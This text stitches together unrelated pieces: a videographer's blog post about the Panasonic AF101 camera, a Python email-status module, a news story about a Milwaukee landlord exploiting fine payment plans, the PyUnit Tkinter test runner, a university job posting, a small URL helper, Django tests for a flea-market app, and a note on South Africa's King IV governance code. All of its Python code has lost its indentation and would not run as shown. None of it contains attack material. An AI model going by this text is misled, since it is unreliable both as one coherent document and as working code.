It’s a big step change for us as we’re very much into the reporter “run and gun” style of filming. By that I mean we often have short deadlines and increasingly shorter budgets which mean we’ve adapted to getting the most from a shoot day. We record footage very quickly to maximise our time on site and then add the “extras” and beauty to the video in post-production.
So the idea of fiddling about with lenses and iso settings while on a shoot location to get the perfect balanced shot with a blurred background is an alien concept to us, but we’re loving the challenge! When I took the Panasonic AG-AF101 body out of its box it felt very intuitive and easy to set up. However, worryingly after 10 or 15 minutes of fiddling there was no picture! I tried changing the adapter and the lens but still nothing.
Oh, and if anyone knows of a good shoulder mount for the Panasonic AF101 please let me know, I’m a bit loathed to pay over £2000 for a piece of slightly curved metal and a rolling pin handle! |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import email
import email.utils
import gtk
from gettext import gettext as _
from sugar.graphics.icon import Icon
from sugar.graphics import alert
from tags import FLAGS, HARDCODED
def ugly_hack(self, papa, pspec, value):
if pspec.name=='msg':
if self._msg != value:
self._msg = value
self._msg_label.set_markup(self._msg)
else:
papa.do_set_property(self, pspec, value)
class ProgressAlert(alert.Alert):
def __init__(self, *args, **kwds):
alert.Alert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-busy')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.Alert, pspec, value)
class ErrorAlert(alert.NotifyAlert):
def __init__(self, *args, **kwds):
alert.NotifyAlert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-notification')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.NotifyAlert, pspec, value)
class ProgressTracker(object):
def __init__(self, activity, title):
self._activity = activity
self._title = title
self._alert = ProgressAlert()
self._alert.props.title = title
#self._activity.add_alert(self._alert)
def _remove_alert(self, *args):
gtk.gdk.threads_enter()
self._activity.remove_alert(self._alert)
gtk.gdk.threads_leave()
def done(self):
self._remove_alert()
def update(self, msg):
gtk.gdk.threads_enter()
self._alert.props.msg = msg
gtk.gdk.threads_leave()
def error(self, msg, remove_old=True):
if remove_old: self._remove_alert()
gtk.gdk.threads_enter()
notify(self._activity, self._title, msg)
gtk.gdk.threads_leave()
class InboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Checking email'))
def dump_msg(self, msg_str):
# TODO setting of FLAGS{'has_attachment'], filtering(!)
msg = email.message_from_string(msg_str)
ms = self._activity.ms
key = ms.add_msg(msg)
#if add_msg thinks it's a duplicate, don't associate it
if key == -1:
pass
# gmail sent emails hack
'''
if email.utils.parseaddr(msg['From'])[1]==self._activity.config.transport_account._from_addr:
ms.flag(key, FLAGS['sent'])
else:
ms.associate(HARDCODED['inbox'], key)
'''
ms.associate(HARDCODED['inbox'], key)
class OutboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Sending email'))
def _add_and_flag(self, msg, flag):
ms = self._activity.ms
key = ms.add_msg(msg)
ms.flag(key, flag)
def try_later(self, msgs):
for msg in msgs:
self._add_and_flag(msg, FLAGS['outbound'])
def error_delivering(self, msg):
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i>%s</i>, message saved as draft.' % msg['Subject']), remove_old=False)
def some_rcpts_failed(self, msg, who):
msg['To'] = '; '.join(who)
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i></i> to %s; saved as draft.' % ', '.join(who)), remove_old=False)
def sent(self, msg):
self._add_and_flag(msg, FLAGS['sent'])
def notify(activity, title, msg, timeout=5):
alert = ErrorAlert(timeout)
alert.props.title = title
alert.props.msg = msg
activity.add_alert(alert)
alert.connect('response', lambda x,y: activity.remove_alert(alert))
|
Will Sherard, one of Milwaukee's most notorious inner city landlords, has long taken advantage of the system by routinely paying the bare minimum on fines for hundreds of building code violations, even as he pays cash to acquire new properties.
That game may be ending.
City attorneys have asked the Municipal Court to make Sherard prove he cannot afford to pay his fines, including $48,800 that was due last week. Presiding Municipal Court Judge Philip Chavez scheduled a hearing on the matter for next week. The city took the step after a Journal Sentinel investigation exposed ways that landlords, including Sherard, game the legal system.
The Journal Sentinel investigation found that Chavez and other municipal court judges have allowed landlords — who in some cases owe tens of thousands of dollars in fines — to take advantage of payment plans that allow them to pay as little as $100 every three months. In Sherard's case, it would take him between 17 and 25 years at the current pace to pay his largest fines of $10,000 each.
In the wake of the Journal Sentinel investigation, Mayor Tom Barrett and other officials said they would be cracking down on the practice. Officials from the City Attorney's Office said they had filed a standing objection to challenge payment plans sought by landlords hit with fines for code violations.
'Our office has met with Chavez ... to lodge a standing objection on a going-forward basis to installment plans and (is) asking for hearings if that's going to happen,' veteran assistant city attorney Gregg Hagopian said during an April 25 interview, in which he was joined by Barrett.
Deputy City Attorney Adam Stephens, who oversees building code enforcement matters, confirmed later that day that a standing objection to the payment plans had been made.
But no such motion had been filed until Thursday — the day Sherard's bill came due.
Chavez, for his part, said he met with Stephens several weeks ago and the subject of objecting to payment plans came up, although nothing was filed and no firm request was made. The judge added that he was unsure whether it was even feasible for the court to approve a standing objection to all payment plan requests.
Thus the city now plans to focus on about a dozen landlords with the most in outstanding fines and file motions on their individual cases.
City Attorney Grant Langley did not respond to requests for comment for this story.
Stephens said seeking payment hearings is one of several steps the city will be taking to crack down on landlords who do not pay fines.
Sherard and other landlords have long taken advantage of the Municipal Court's walk-in policy. The court allows people who are cited with municipal ordinance violations to come to court and deal with certain matters without an appointment — and without a prosecutor in attendance. For example, scheduling a hearing date or seeking an extension to pay fines may be dealt with during the walk-in periods.
The policy is designed to help people with busy schedules appear before a judge, but the Journal Sentinel investigation showed Sherard has used it to repeatedly get more time to pay his fines.
On Oct. 25, 2011, Chavez fined Sherard $45,184 for about 100 building code violations on six properties he owns. Since then, Sherard has come to court every 60 to 90 days when the fines were due, paid $100 on each of six fines and asked Chavez for payment extension — a request that has been routinely approved.
As a result, Sherard has paid only $5,584 on those fines without ever being considered delinquent.
During the same period, Sherard or his Morocco Investments LLC has paid $636,000 in cash to buy 63 houses at weekly sheriff's sales. Sherard has been a landlord for a half-century and has twice been convicted of misdemeanor unfair rental practices. Records show he or Morocco owns more than 100 Milwaukee rental properties.
In 2011, Sherard came up with $700,000 in one week when a federal judge jailed him for contempt after he repeatedly failed to produce the cash needed for lead paint abatement on his properties. Last year, in a separate matter, instead of seizing 31 properties on which Sherard owed delinquent taxes, the city sued him in Milwaukee County Circuit Court and won a $119,429 judgment.
The suit was filed because city officials said some landlords buy properties on the cheap — often at weekly sheriff's sales of properties foreclosed when borrowers fail to pay their mortgages. When buyers don't pay property taxes, the city typically seizes the homes after three years. That erases the owner's debt and sticks taxpayers with the deed to an often dilapidated property.
Chavez has said he hasn't considered how much in assets Sherard — or other landlords who seek extensions — have because city prosecutors have never brought the matter up. The judge has said he can only consider the evidence before him.
City attorneys have said they don't present the evidence because they never know when a defendant will appear to seek an extension due to the walk-in policy.
The practice has been going on for decades, said David Halbrooks, who was an assistant city attorney in the 1990s and then served briefly as a municipal judge.
'It was frequently frustrating because defendants would be able to come in on their own without the city being represented,' Halbrooks said.
As a result, 'the payment plan would become a legal strategy,' he said.
He noted that instead of payment hearings after the fact, 'it might be more efficient to have the discussion regarding a payment plan at the time of sentencing' when the fine is imposed and a when a prosecutor is present.
On Thursday, the day that 14 of Sherard's fines — including the six spotlighted in the Journal Sentinel story — came due, the city filed a motion asking to be notified so it could object to a new extension.
'We don't want any more partial payments,' said Patrick Leigl, the assistant city attorney who filed the objection.
The motion cites 22 Sherard or Morocco cases with fines totaling nearly $70,000. Sherard 'has surpassed a reasonable time to satisfy the total forfeiture judgment,' Leigl wrote in the motion. The fines cover infractions dating to 2009.
Although the fines were due Thursday, the Municipal Court automatically grants defendants a 10-day grace period before enforcement action is taken. Enforcement steps can include sending the debt to collection, issuing warrants or imposing property liens.
Sherard came to the walk-in court Monday, presumably to make nominal payments and seek a new extension to pay his fines. Instead, he was greeted by the city motion.
Chavez ordered a hearing for June 3, rejecting requests by Sherard — who frequently represents himself — for more time to prepare a case.
'I don't know what that means,' Sherard said, referring to the city's action.
Sherard complained that the city and court were taking the actions because of the Journal Sentinel stories.
Sherard rushed out of the courtroom after the Monday court session. Reached by phone Tuesday, Sherard told a reporter 'let me get back to you.' He has not called back.
To read the Journal Sentinel's investigation into how landlords have been gaming the system when it comes to paying fines, go to jsonline.com/landlordgames. |
#!/usr/bin/env python
"""
GUI framework and application for use with Python unit testing framework.
Execute tests written using the framework provided by the 'unittest' module.
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__author__ = "Steve Purcell ([email protected])"
__version__ = "$Revision: 2.0 $"[11:-2]
import unittest
import sys
import Tkinter
import tkMessageBox
import traceback
import string
tk = Tkinter # Alternative to the messy 'from Tkinter import *' often seen
##############################################################################
# GUI framework classes
##############################################################################
class BaseGUITestRunner:
"""Subclass this class to create a GUI TestRunner that uses a specific
windowing toolkit. The class takes care of running tests in the correct
manner, and making callbacks to the derived class to obtain information
or signal that events have occurred.
"""
def __init__(self, *args, **kwargs):
self.currentResult = None
self.running = 0
self.__rollbackImporter = None
self.initGUI(*args, **kwargs)
def getSelectedTestName(self):
"Override to return the name of the test selected to be run"
pass
def errorDialog(self, title, message):
"Override to display an error arising from GUI usage"
pass
def runClicked(self):
"To be called in response to user choosing to run a test"
if self.running: return
testName = self.getSelectedTestName()
if not testName:
self.errorDialog("Test name entry", "You must enter a test name")
return
if self.__rollbackImporter:
self.__rollbackImporter.rollbackImports()
self.__rollbackImporter = RollbackImporter()
try:
test = unittest.defaultTestLoader.loadTestsFromName(testName)
except Exception:
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(*sys.exc_info())
self.errorDialog("Unable to run test '%s'" % testName,
"Error loading specified test: %s, %s" % \
(exc_type, exc_value))
return
self.currentResult = GUITestResult(self)
self.totalTests = test.countTestCases()
self.running = 1
self.notifyRunning()
test.run(self.currentResult)
self.running = 0
self.notifyStopped()
def stopClicked(self):
"To be called in response to user stopping the running of a test"
if self.currentResult:
self.currentResult.stop()
# Required callbacks
def notifyRunning(self):
"Override to set GUI in 'running' mode, enabling 'stop' button etc."
pass
def notifyStopped(self):
"Override to set GUI in 'stopped' mode, enabling 'run' button etc."
pass
def notifyTestFailed(self, test, err):
"Override to indicate that a test has just failed"
pass
def notifyTestErrored(self, test, err):
"Override to indicate that a test has just errored"
pass
def notifyTestStarted(self, test):
"Override to indicate that a test is about to run"
pass
def notifyTestFinished(self, test):
"""Override to indicate that a test has finished (it may already have
failed or errored)"""
pass
class GUITestResult(unittest.TestResult):
"""A TestResult that makes callbacks to its associated GUI TestRunner.
Used by BaseGUITestRunner. Need not be created directly.
"""
def __init__(self, callback):
unittest.TestResult.__init__(self)
self.callback = callback
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.callback.notifyTestErrored(test, err)
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.callback.notifyTestFailed(test, err)
def stopTest(self, test):
unittest.TestResult.stopTest(self, test)
self.callback.notifyTestFinished(test)
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.callback.notifyTestStarted(test)
class RollbackImporter:
"""This tricky little class is used to make sure that modules under test
will be reloaded the next time they are imported.
"""
def __init__(self):
self.previousModules = sys.modules.copy()
def rollbackImports(self):
for modname in sys.modules.keys():
if modname not in self.previousModules:
# Force reload when modname next imported
del(sys.modules[modname])
##############################################################################
# Tkinter GUI
##############################################################################
_ABOUT_TEXT="""\
PyUnit unit testing framework.
For more information, visit
http://pyunit.sourceforge.net/
Copyright (c) 2000 Steve Purcell
<[email protected]>
"""
_HELP_TEXT="""\
Enter the name of a callable object which, when called, will return a \
TestCase or TestSuite. Click 'start', and the test thus produced will be run.
Double click on an error in the listbox to see more information about it, \
including the stack trace.
For more information, visit
http://pyunit.sourceforge.net/
or see the bundled documentation
"""
class TkTestRunner(BaseGUITestRunner):
"""An implementation of BaseGUITestRunner using Tkinter.
"""
def initGUI(self, root, initialTestName):
"""Set up the GUI inside the given root window. The test name entry
field will be pre-filled with the given initialTestName.
"""
self.root = root
# Set up values that will be tied to widgets
self.suiteNameVar = tk.StringVar()
self.suiteNameVar.set(initialTestName)
self.statusVar = tk.StringVar()
self.statusVar.set("Idle")
self.runCountVar = tk.IntVar()
self.failCountVar = tk.IntVar()
self.errorCountVar = tk.IntVar()
self.remainingCountVar = tk.IntVar()
self.top = tk.Frame()
self.top.pack(fill=tk.BOTH, expand=1)
self.createWidgets()
def createWidgets(self):
"""Creates and packs the various widgets.
Why is it that GUI code always ends up looking a mess, despite all the
best intentions to keep it tidy? Answers on a postcard, please.
"""
# Status bar
statusFrame = tk.Frame(self.top, relief=tk.SUNKEN, borderwidth=2)
statusFrame.pack(anchor=tk.SW, fill=tk.X, side=tk.BOTTOM)
tk.Label(statusFrame, textvariable=self.statusVar).pack(side=tk.LEFT)
# Area to enter name of test to run
leftFrame = tk.Frame(self.top, borderwidth=3)
leftFrame.pack(fill=tk.BOTH, side=tk.LEFT, anchor=tk.NW, expand=1)
suiteNameFrame = tk.Frame(leftFrame, borderwidth=3)
suiteNameFrame.pack(fill=tk.X)
tk.Label(suiteNameFrame, text="Enter test name:").pack(side=tk.LEFT)
e = tk.Entry(suiteNameFrame, textvariable=self.suiteNameVar, width=25)
e.pack(side=tk.LEFT, fill=tk.X, expand=1)
e.focus_set()
e.bind('<Key-Return>', lambda e, self=self: self.runClicked())
# Progress bar
progressFrame = tk.Frame(leftFrame, relief=tk.GROOVE, borderwidth=2)
progressFrame.pack(fill=tk.X, expand=0, anchor=tk.NW)
tk.Label(progressFrame, text="Progress:").pack(anchor=tk.W)
self.progressBar = ProgressBar(progressFrame, relief=tk.SUNKEN,
borderwidth=2)
self.progressBar.pack(fill=tk.X, expand=1)
# Area with buttons to start/stop tests and quit
buttonFrame = tk.Frame(self.top, borderwidth=3)
buttonFrame.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)
self.stopGoButton = tk.Button(buttonFrame, text="Start",
command=self.runClicked)
self.stopGoButton.pack(fill=tk.X)
tk.Button(buttonFrame, text="Close",
command=self.top.quit).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="About",
command=self.showAboutDialog).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="Help",
command=self.showHelpDialog).pack(side=tk.BOTTOM, fill=tk.X)
# Area with labels reporting results
for label, var in (('Run:', self.runCountVar),
('Failures:', self.failCountVar),
('Errors:', self.errorCountVar),
('Remaining:', self.remainingCountVar)):
tk.Label(progressFrame, text=label).pack(side=tk.LEFT)
tk.Label(progressFrame, textvariable=var,
foreground="blue").pack(side=tk.LEFT, fill=tk.X,
expand=1, anchor=tk.W)
# List box showing errors and failures
tk.Label(leftFrame, text="Failures and errors:").pack(anchor=tk.W)
listFrame = tk.Frame(leftFrame, relief=tk.SUNKEN, borderwidth=2)
listFrame.pack(fill=tk.BOTH, anchor=tk.NW, expand=1)
self.errorListbox = tk.Listbox(listFrame, foreground='red',
selectmode=tk.SINGLE,
selectborderwidth=0)
self.errorListbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1,
anchor=tk.NW)
listScroll = tk.Scrollbar(listFrame, command=self.errorListbox.yview)
listScroll.pack(side=tk.LEFT, fill=tk.Y, anchor=tk.N)
self.errorListbox.bind("<Double-1>",
lambda e, self=self: self.showSelectedError())
self.errorListbox.configure(yscrollcommand=listScroll.set)
def getSelectedTestName(self):
return self.suiteNameVar.get()
def errorDialog(self, title, message):
tkMessageBox.showerror(parent=self.root, title=title,
message=message)
def notifyRunning(self):
self.runCountVar.set(0)
self.failCountVar.set(0)
self.errorCountVar.set(0)
self.remainingCountVar.set(self.totalTests)
self.errorInfo = []
while self.errorListbox.size():
self.errorListbox.delete(0)
#Stopping seems not to work, so simply disable the start button
#self.stopGoButton.config(command=self.stopClicked, text="Stop")
self.stopGoButton.config(state=tk.DISABLED)
self.progressBar.setProgressFraction(0.0)
self.top.update_idletasks()
def notifyStopped(self):
self.stopGoButton.config(state=tk.ACTIVE)
#self.stopGoButton.config(command=self.runClicked, text="Start")
self.statusVar.set("Idle")
def notifyTestStarted(self, test):
self.statusVar.set(str(test))
self.top.update_idletasks()
def notifyTestFailed(self, test, err):
self.failCountVar.set(1 + self.failCountVar.get())
self.errorListbox.insert(tk.END, "Failure: %s" % test)
self.errorInfo.append((test,err))
def notifyTestErrored(self, test, err):
self.errorCountVar.set(1 + self.errorCountVar.get())
self.errorListbox.insert(tk.END, "Error: %s" % test)
self.errorInfo.append((test,err))
def notifyTestFinished(self, test):
self.remainingCountVar.set(self.remainingCountVar.get() - 1)
self.runCountVar.set(1 + self.runCountVar.get())
fractionDone = float(self.runCountVar.get())/float(self.totalTests)
fillColor = len(self.errorInfo) and "red" or "green"
self.progressBar.setProgressFraction(fractionDone, fillColor)
def showAboutDialog(self):
tkMessageBox.showinfo(parent=self.root, title="About PyUnit",
message=_ABOUT_TEXT)
def showHelpDialog(self):
tkMessageBox.showinfo(parent=self.root, title="PyUnit help",
message=_HELP_TEXT)
def showSelectedError(self):
selection = self.errorListbox.curselection()
if not selection: return
selected = int(selection[0])
txt = self.errorListbox.get(selected)
window = tk.Toplevel(self.root)
window.title(txt)
window.protocol('WM_DELETE_WINDOW', window.quit)
test, error = self.errorInfo[selected]
tk.Label(window, text=str(test),
foreground="red", justify=tk.LEFT).pack(anchor=tk.W)
tracebackLines = traceback.format_exception(*error + (10,))
tracebackText = string.join(tracebackLines,'')
tk.Label(window, text=tracebackText, justify=tk.LEFT).pack()
tk.Button(window, text="Close",
command=window.quit).pack(side=tk.BOTTOM)
window.bind('<Key-Return>', lambda e, w=window: w.quit())
window.mainloop()
window.destroy()
class ProgressBar(tk.Frame):
"""A simple progress bar that shows a percentage progress in
the given colour."""
def __init__(self, *args, **kwargs):
tk.Frame.__init__(*(self,) + args, **kwargs)
self.canvas = tk.Canvas(self, height='20', width='60',
background='white', borderwidth=3)
self.canvas.pack(fill=tk.X, expand=1)
self.rect = self.text = None
self.canvas.bind('<Configure>', self.paint)
self.setProgressFraction(0.0)
def setProgressFraction(self, fraction, color='blue'):
self.fraction = fraction
self.color = color
self.paint()
self.canvas.update_idletasks()
def paint(self, *args):
totalWidth = self.canvas.winfo_width()
width = int(self.fraction * float(totalWidth))
height = self.canvas.winfo_height()
if self.rect is not None: self.canvas.delete(self.rect)
if self.text is not None: self.canvas.delete(self.text)
self.rect = self.canvas.create_rectangle(0, 0, width, height,
fill=self.color)
percentString = "%3.0f%%" % (100.0 * self.fraction)
self.text = self.canvas.create_text(totalWidth/2, height/2,
anchor=tk.CENTER,
text=percentString)
def main(initialTestName=""):
root = tk.Tk()
root.title("PyUnit")
runner = TkTestRunner(root, initialTestName)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
main(sys.argv[1])
else:
main()
|
Cedarville University is seeking to hire a Regional Director of Development to develop long term relationships built on a firm understanding of each donor’s interest, passions and values for the purpose of soliciting gifts for annual, capital and endowment needs. This is a full-time, exempt position that reports to the Associate Vice President for Development.
All job applicants should be aware that Cedarville University is a private religious employer which holds specific doctrinal positions. All employees of Cedarville University must be in full agreement with the doctrinal positions of the University and agree to live by workplace lifestyle standards.
All official inquiries should be directed to Teresa Day, Director of Staffing Services. Applicants must agree with and be willing to abide by Cedarville University's doctrinal statement, community covenant, and general workplace standards.
This position is subject to the University's verification of credentials and other information required by law and Cedarville University policies, including the completion of a criminal history investigation. Cedarville University is an Equal Opportunity Employer.
CEDARVILLE UNIVERSITY, located in Cedarville, Ohio, is an accredited Baptist university of arts, sciences, professional, and graduate programs. As a Christ-centered learning community, the University is equipping students for lifelong leadership and service through an education marked by excellence and grounded in biblical truth. Home to 3,300 Christian students, Cedarville is known for its commitment to biblical integration, spiritual formation, cultural engagement, academic quality, worldwide ministry, and student satisfaction. Recognized by U.S. News & World Report, The Princeton Review, and Peterson’s Competitive Colleges as one of the Midwest's best institutions, the University consistently achieves top rankings at national academic competitions. Founded in 1887, the University has invested more than $100 million in academic facilities to provide modern learning environments, updated networking and technology, and a fully wireless 400-acre campus. More than 100 programs of study are taught by 200 full-time Christian faculty members. For more information about the University, please visit www.cedarville.edu. Except as provided below, qualified applicants are considered for a...ll positions, and employees are treated without regard to race, gender, national origin, age, marital or veteran status, disability – if such disability may be accommodated without undue hardship. The University, under various sections of Title VII of the Civil Rights Act of 1964 (as amended) and Title IX of the Education Amendments of 1972 (as amended), reserves the right to discriminate on the basis of religion, marital status or gender (with regard to certain positions) where approved job description for a position indicates that the determination relates to a bonafide occupational qualification reasonably necessary to the normal operation of that particular position, or where the job description can demonstrate that the University is unable to reasonably accommodate an employee's religious observance or practice without undue hardship in the conduct of that position's responsibilities and activities. |
from pylons.i18n import _
from adhocracy.lib import cache
from adhocracy.lib.helpers import proposal_helper as proposal
from adhocracy.lib.helpers import url as _url
@cache.memoize('selection_url')
def url(selection, member=None, format='html', selection_page=False, **kwargs):
if member is None and format == 'html' and not selection_page:
anchor = "selection_%s" % selection.id
return proposal.url(selection.proposal, anchor=anchor)
url = proposal.url(selection.proposal, member='implementation')
url += "/" + str(selection.id)
return _url.append_member_and_format(url, member=member, format=format,
**kwargs)
@cache.memoize('selection_bc')
def bc_entity(selection):
bc = _url.link(_("Implementation"),
proposal.url(selection.proposal,
member=u'/implementation'))
bc += _url.BREAD_SEP + _url.link(selection.page.title, url(selection))
return bc
def breadcrumbs(selection):
bc = _url.root()
if selection is not None:
bc = bc_entity(selection)
else:
bc += _("Implementation")
return bc
|
Red hearts and doves translucent red rose invitations, , . . .
© 2017 Midwest All Stars. All rights reserved. Theme by elemis. |
# -*- coding: utf-8 -*-
from http import HTTPStatus
from django.test import Client, TestCase
import faker
from .factories import *
from .api_access import Api
from . import ResultMixin
from ..models import Item, Receipt, ReceiptItem
__author__ = 'codez'
class PublicTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.type = ItemTypeFactory(event=self.event)
user = self.vendor.user
if not self.client.login(username=user.username, password=UserFactory.DEFAULT_PASSWORD):
raise RuntimeError("Could not log in.")
def test_register_item(self):
data = dict(
name=faker.Faker().sentence(nb_words=3),
price="1.25",
tag_type="short",
suffixes="",
item_type=self.type.id,
adult=False,
)
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/item/".format(self.event.slug),
data=data)).json()
self.assertEqual(1, len(result))
r_item = result[0]
self.assertEqual(self.vendor.id, r_item["vendor_id"])
def test_register_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=4,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_box_with_single_item(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_single_bundle_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=2,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
class StatesTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.items = ItemFactory.create_batch(10, vendor=self.vendor)
self.counter = CounterFactory(event=self.event)
self.clerk = ClerkFactory(event=self.event)
self.api = Api(client=self.client, event=self.event)
self.assertSuccess(self.api.clerk_login(code=self.clerk.get_code(), counter=self.counter.private_key))
def test_fail_reserve_without_receipt(self):
ret = self.api.item_reserve(code=self.items[0].code)
self.assertEqual(HTTPStatus.BAD_REQUEST, ret.status_code)
def test_normal_item_receipt(self):
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.STAGED, db_item.state)
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.SOLD, db_item.state)
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_double_reservation(self):
# Note: This tests only two subsequent requests.
# Two simultaneous requests cannot be tested here as basic tests require sequential request/database access.
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
expected_failure = self.api.item_reserve(code=item_code)
self.assertEqual(HTTPStatus.LOCKED, expected_failure.status_code)
def test_normal_box_receipt(self):
box = BoxFactory(adopt=True, items=self.items)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
reserve_count = 3
self.assertSuccess(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count))
self.assertEqual(reserve_count, Item.objects.filter(box=box, state=Item.STAGED).count())
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_box_over_reserve(self):
reserve_count = 3
box = BoxFactory(vendor=VendorFactory(event=self.event), item_count=reserve_count - 1)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertResult(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count),
expect=HTTPStatus.CONFLICT)
def test_box_return_receipt(self):
"""Reserving and releasing box items should avoid representative item,
as it is the one used to display item price.
Relevant when part of box items are sold, and price of rest of its items are changed."""
box = BoxFactory(adopt=True, items=self.items, box_number=1)
Item.objects.all().update(state=Item.BROUGHT)
representative_item_id = box.representative_item_id
receipt = self.assertSuccess(self.api.receipt_start()).json()
def check_count(n):
self.assertEqual(n, Item.objects.filter(state=Item.STAGED).count())
self.assertEqual(n, ReceiptItem.objects.filter(receipt__pk=receipt["id"], action=ReceiptItem.ADD).count())
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=4))
self.assertEqual(4, Item.objects.filter(state=Item.STAGED).count())
# Representative item should not be added to the receipt first.
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
self.assertEqual(2, Item.objects.filter(state=Item.STAGED).count())
# Representative item should be first to be released.
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=8))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=1))
check_count(9)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=1))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
check_count(8)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
|
In the run-up to the April 2017 implementation of the King IV Code on Corporate Governance for South Africa, there’s lots of talk about what it all means. From my perspective and experience working with companies, regulators and governments alike on ways to improve corporate governance, it all boils down to a change in one little word. But with this change comes big implications for companies.
The King IV Code requires listed companies to both apply the financial rules AND to explain the non-financial aspects of company operations. It replaces the King III Code requirement that companies either apply the financial reporting rules OR explain the reasons they are not. The revised code obligates companies to go beyond boilerplate reporting about their financial status to reveal more about their operational context.
The implication is clear: South African companies need to get better fast in their approach to transparency and disclosure.
